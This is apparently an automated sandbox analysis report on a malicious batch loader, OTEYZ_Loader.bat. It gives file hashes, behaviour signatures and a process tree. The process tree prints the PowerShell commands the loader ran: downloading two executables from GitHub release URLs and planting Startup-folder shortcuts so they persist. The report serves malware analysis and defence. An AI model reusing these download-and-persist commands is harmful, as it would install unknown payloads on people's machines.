Overview

overview

10

Static

static

1

OTEYZ_Loader.bat

windows7-x64

8

OTEYZ_Loader.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 12:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OTEYZ_Loader.bat

  • Size

    1KB

  • MD5

    f3f83ae17a3f81e0265b9ce7e480bd4e

  • SHA1

    994d8d5b533fd09630b45a0d0404f65557e83d5d

  • SHA256

    412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74

  • SHA512

    cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\OTEYZ_Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:572
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    258401c39ebc8a032438d0427f619181

    SHA1

    ce83b7cc90e06b87feb87bd5a4cf46e8443f1b4b

    SHA256

    1296dd7f84e6ce7233181269dd526d4ff48c7cfa9078ad37fb9c716e5d3fff6f

    SHA512

    e1c434ae9df40fb1492279f0c2a89e330ec375534c6639ce972ebf4a1c0f2356c2d783dccbcb8632a1069f9b035acf95ff2335bb2022b061723328049f552795

    Download Submit

  • memory/1628-4-0x000007FEF57BE000-0x000007FEF57BF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1628-5-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1628-6-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1628-7-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1628-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1628-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1628-9-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1628-11-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1628-12-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2576-18-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2576-19-0x0000000002690000-0x0000000002698000-memory.dmp

    Filesize

    32KB

    Download